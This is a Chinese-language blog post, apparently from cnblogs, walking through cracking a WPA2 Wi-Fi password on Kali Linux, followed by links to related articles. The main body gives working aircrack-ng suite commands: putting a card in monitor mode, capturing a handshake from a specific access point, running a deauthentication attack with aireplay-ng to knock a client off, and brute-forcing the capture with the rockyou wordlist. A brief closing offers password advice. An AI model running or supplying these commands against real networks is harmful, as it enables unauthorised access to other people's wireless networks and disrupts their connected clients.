最近一直用flask写自己的博客框架,等过段时间才能将其分享出来,所以在此期间决定开个无线安全的专题,分享一些无线安全方面的知识。

  好了,废话不多说,咱们进入今天的主题,使用kali linux上的无线安全工具对wpa加密的wifi进行密码破解。由于现在wep加密太少了,所以直接略过,选择破解wpa。WPA破解是通过截获客户端和路由器之间的握手包,根据字典的大小进行暴力破解,也就是说字典的大小直接决定了破解的成功与否。(我的新书《Python爬虫开发与项目实战》出版了,大家可以看一下样章

  操作系统:kali linux , 硬件:无线网卡 WN722N

  (1)打开终端:1.输入ifconfig,查看无线网卡是否加载了

        2.输入:airmon-ng start wlan3,将网络启动为监听模式

    

       3.输入:airodump-ng wlan3mon 监听网络数据包 ,如果出现以下错误,继续执行图中代码。

             继续输入:airodump-ng wlan3mon,会出现监听界面。

        

        从监听界面中我们可以看到这个wifi的mac地址8C:AB:8E:A9:CB:60,加密方式:WPA2,所在的信道1.

        这个wifi现在有一个客户端正在进行连接。接下来开始抓包,抓取握手包。

        4.输入 airodump-ng -c 1 --bssid 8C:AB:8E:A9:CB:60 -w phi wlan3mon

          -c:指定信道 --bssid:指定wifi mac  -w:指定抓取的数据包存储的文件

        5:这时候我们需要再开启一个终端进行取消验证攻击,迫使这个已经连上的客户端断开。

        这样当客户端自动连接的时候,就可以抓取这个握手包了。

        在新的终端中执行: aireplay-ng -0 3 -a 8C:AB:8E:A9:CB:60 -c 70:1A:04:B7:1A:90 wlan3mon

          -0:指定为取消验证攻击   3:攻击次数 -a:指定ap的mac  -c:指定客户端的mac

       6:执行完之后,过一会就会看到监听到了握手包。

        

      7:既然抓到了握手包,Ctrl+C停止抓包。使用aircrack-ng进行暴力破解。

      在终端中输入:aircrack-ng -w /usr/share/wordlists/rockyou.txt phi-01.cap 

        -w:指定破解用的密码字典  phi-01.cap:这个是之前抓取握手包的数据包

      大约过了5分钟,爆破成功.出现了KEY FOUND后面的中括号中就是密码。

  (2)总结:

    1.由于WPA破解是采用暴力破解的方式(路由器没有开启wps),字典越大,破解的可能性越大。所以大家尽量设置复杂的密码,多位数+字母。

    2.很多人采取隐藏SSID,不暴露wifi名称的方式来防止被破解,事实并没有什么用,因为整个破解过程中并不需要知道你的wifi名称。

  今天的分享就到这里,下一篇继续分析。如果大家觉得还可以呀,记得推荐呦。
 欢迎大家支持我公众号:   

本文章属于原创作品,欢迎大家转载分享。尊重原创,转载请注明来自:七夜的故事 http://www.cnblogs.com/qiyeboy/

 

无线安全专题01--kali破解WPA的更多相关文章

  1. 无线安全专题_破解篇02--kali破解pin码

    最近项目有点紧,所以本应该上周发的文章,拖到了本周三,在此说声抱歉.无线安全专题,我打算系统地写六个部分,分别为破解篇,攻击篇,欺骗篇,路由篇,移动篇和蓝牙篇,当然在发布的过程中,可能还会掺杂着发布f ...

  2. kali系统破解WPA密码实战

    上次发布过一篇在OSX系统破解WIFI密码的教程, 这次发布一篇使用kali破解wifi的教程 WEP和WPA/PSK的区别 WPA/PSK的加密方式相对于WEP的加密方式更加安全,WEP是一种老式的 ...

  3. 无线安全之破解WPA/WPA2 加密WiFi

    准备 可以使用无线网络的Kali Linux 由于古老的WPE加密的WiFi已经几乎没有了,所以这里我就不去细说如何破解WPE加密的WiFi了.今天就来聊聊 如何来使用Kali Linux来破解Wpa ...

  4. Final——无线网络密码破解——WPA/WPA2

    Final--无线网络密码破解--WPA/WPA2 20154305 齐帅 ↓ ↓ ↓ * # % & 郑 重 声 明 & % # * ↓ ↓ ↓ 本实验教程用于探索无线路由安全漏洞, ...

  5. Aircrack-ng破解WPA/WPA2加密WiFi教程(Kali)

    一.说明 以前学Kali,很多人都笑赞“WiFi破解神器”.我很烦,一是我不会破解二是我觉得他们也不会破解三是我隐约觉得所谓的WiFi破解不是什么技术性的操作. 后来基础知识充分了然后弄了个无线网卡, ...

  6. 无线安全专题_攻击篇--MAC泛洪攻击

    上一篇讲解了无线安全专题_攻击篇--干扰通信,没在首页待多长时间就被拿下了,看来之后不能只是讲解攻击实战,还要进行技术原理和防御方法的讲解.本篇讲解的是局域网内的MAC泛洪攻击,这种攻击方式主要目的是 ...

  7. 取代奶瓶Minidwep-gtk破解WPA 全攻略

    取代奶瓶Minidwep-gtk 破 WPA 全攻略  目录 1. CDlinux 下使用 minidwepgtk 获取握手包并使用自带的字典破解 2. 自带的字典破解不出密码时使用 U 盘外挂字典继 ...

  8. WPS, 破解WPA/WPA2密钥的捷径

    1.关于WPS(WIFI保护设置) WPS(WIFI保护设置)主要致力于简化无线网络的安全加密设置. 传统方式下,用户新建一个无线网络时,必须在接入点手动设置网络名(SSID)和安全密钥,然后在客户端 ...

  9. 关于如何通过kali linux 攻击以及破解WPA/WPA2无线加密

    http://blog.csdn.net/wingstudio_zongheng/article/details/51435212 1.前期准备 1)打开一个终端  执行命令: ifconfig   ...

随机推荐

  1. 安装和使用memcached

    引用:http://www.czhphp.com/archives/252 如何将 memcached 融入到您的环境中? 在开始安装和使用 using memcached 之前,我们需要了解如何将 ...

  2. NHibernate系列文章四:NHibernate运行时监控

    摘要 有三种方式可以实现NHibernate运行时监控,监控的信息包括:执行了的SQL语句.NHibernate执行过程.数据库性能分析.这对我们学习NHibernate有很大的帮助,在工作中也能快速 ...

  3. Android之下拉刷新,上啦加载的实现(一)

    转载地址http://blog.csdn.net/leehong2005/article/details/12567757#t5 前段时间项目中用到了下拉刷新功能,之前在网上也找到过类似的demo,但 ...

  4. .c文件如何编译为ko的MAKEFILE文件编写

    首先需要知道: obj-m = *.o obj-y = *.o 上面两者的区别在于,前者才会生成ko文件,后者只是代码编译进内核,并不生成ko文件. 生成KO文件,分两种情况:单个.c文件和多个.c文 ...

  5. 用定时器令P0(或其它IO口)产生多路方波

    void Timer0_isr(void) interrupt 1 using 1{ static unsigned char i;  //重新赋值 12M晶振计算,指令周期1uS,500x2=1mS ...

  6. Jquery easyui中的有效性检查

    使用过程中的一积累,备查. EasyUI 验证框使用方法: //*************************** missingMessage:未填写时显示的信息 validType:验证类型见 ...

  7. POJ 3180-The Cow Prom (图论-有向图强联通tarjan算法)

    题目大意:有n个牛在一块, m条单项绳子, 有m个链接关系, 问有多少个团体内部任意两头牛可以相互可达 解题思路:有向图强连通分量模版图 代码如下: #include<stdio.h> # ...

  8. 解除win7系统静音

    #ifdef SPEAKERDEVMUTECONTROL# define SPEAKERDEVMUTECONTROL_EXPORT __declspec(dllexport)#else# define ...

  9. Nginx-->进阶-->Module-->ngx_http_stub_status_module

    一.模块介绍 The ngx_http_stub_status_module module provides access to basic status information. This modu ...

  10. Xshell连接虚拟机

    一般连接虚拟机失败 原因1:ip地址错误 当输入 ifconfig 只有lo没有eth0,或者有eth0,但eth0中确没有inet addr这一行 输入命令:dhclient eth0 就可以了